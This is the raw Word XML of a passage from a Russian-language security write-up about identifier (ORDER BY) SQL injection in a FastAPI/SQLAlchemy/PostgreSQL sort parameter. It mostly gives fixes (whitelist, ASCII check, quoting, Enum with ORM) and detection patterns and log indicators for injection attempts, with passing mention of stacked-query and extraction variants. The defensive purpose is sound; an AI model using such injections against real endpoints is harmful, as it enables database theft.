          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита: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(или SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">quoted_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обязательный шаг даже после whitelist</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from sqlalchemy.sql import quoted_name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SORTABLE_COLUMNS = {"name", "price", "created_at", "rating"}</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safe_sort_column(sort: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not sort.isascii() or sort not in SORTABLE_COLUMNS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return sort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В SQL — quote_ident на стороне PG:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query = text(f'SELECT ... ORDER BY "{safe_sort_column(sort)}" ASC LIMIT 50')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Двойные кавычки + ASCII-check + whitelist = identifier injection физически невозможен. Альтернатива — построение запроса через SQLAlchemy ORM (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">stmt.order_by(getattr(Product, sort))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> после whitelist-проверки) — там identifier-quoting делается автоматически.</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(поведение wire protocol неизменно с 7.4).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любая роль с EXECUTE-доступом к эндпоинту (для extraction — также SELECT на целевые таблицы).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Драйвер для Variant A (stacked):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> simple-protocol режим (см. 3.5.6).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user-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без whitelist ИЛИ whitelist без Unicode/ASCII-нормализации ИЛИ whitelist + concat без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Sort-by-column — стандартный REST-pattern. Корректные шаблоны:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Шаблон 1: Enum + ORM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from enum import Enum</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select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class ProductSort(str, Enum):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    name = "name"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    price = "price"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    created_at = "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rating = "rating"</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@router.get("/products")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_products(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort: ProductSort = Query(ProductSort.created_at),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    order: Literal["asc", "desc"] = Query("asc"),</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col = getattr(Product, sort.value)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    stmt = select(Product).where(Product.deleted_at.is_(None)) \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        .order_by(col.asc() if order == "asc" else col.desc()) \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        .limit(50)</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session.execute(stmt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.scalars().all()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">FastAPI Enum + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Literal["asc", "desc"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> делают валидацию на уровне routing: невалидный sort → HTTP 422 ещё до запроса в БД. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">getattr(Product, ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> гарантирует, что имя колонки берётся из модели (которая уже квалифицирована). SQLAlchemy ORM генерирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY "products"."name" ASC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — quoting автоматический.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Шаблон 2: Whitelist + quote_ident (для legacy / text-SQL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import re</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SORTABLE_COLUMNS = {"name", "price", "created_at", "rating"}</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safe_sort(sort: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ASCII-only + alpha/underscore + whitelist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not re.fullmatch(r"[a-z_][a-z0-9_]*", sort):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if sort not in SORTABLE_COLUMNS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return sort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@router.get("/products")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_products(sort: str = Query("created_at"), ...):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    col = safe_sort(sort)</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 ORDER BY "{col}" ASC LIMIT 50')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ↑ quoting через "" + safe_sort гарантия отсутствия quote-injection</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f-string или concat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY {var}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в SQL-builder без сопровождающего whitelist + quote_ident. В Python: regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY \{\w+\}</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ORDER BY ['"]\s*\+\s*\w+</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запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY 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(SELECT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name;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нетипичные формы ORDER BY clause для конкретного эндпоинта.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 access-log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: query parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort=</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UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, или Unicode-символы вне ASCII-range (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%D0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%D1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-prefix для Cyrillic).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Database-logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: ошибки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">column "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от попыток инъекции имени несуществующей колонки.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Application-логи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: 422 / 500 errors с unusual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter, особенно с non-ASCII characters.</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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
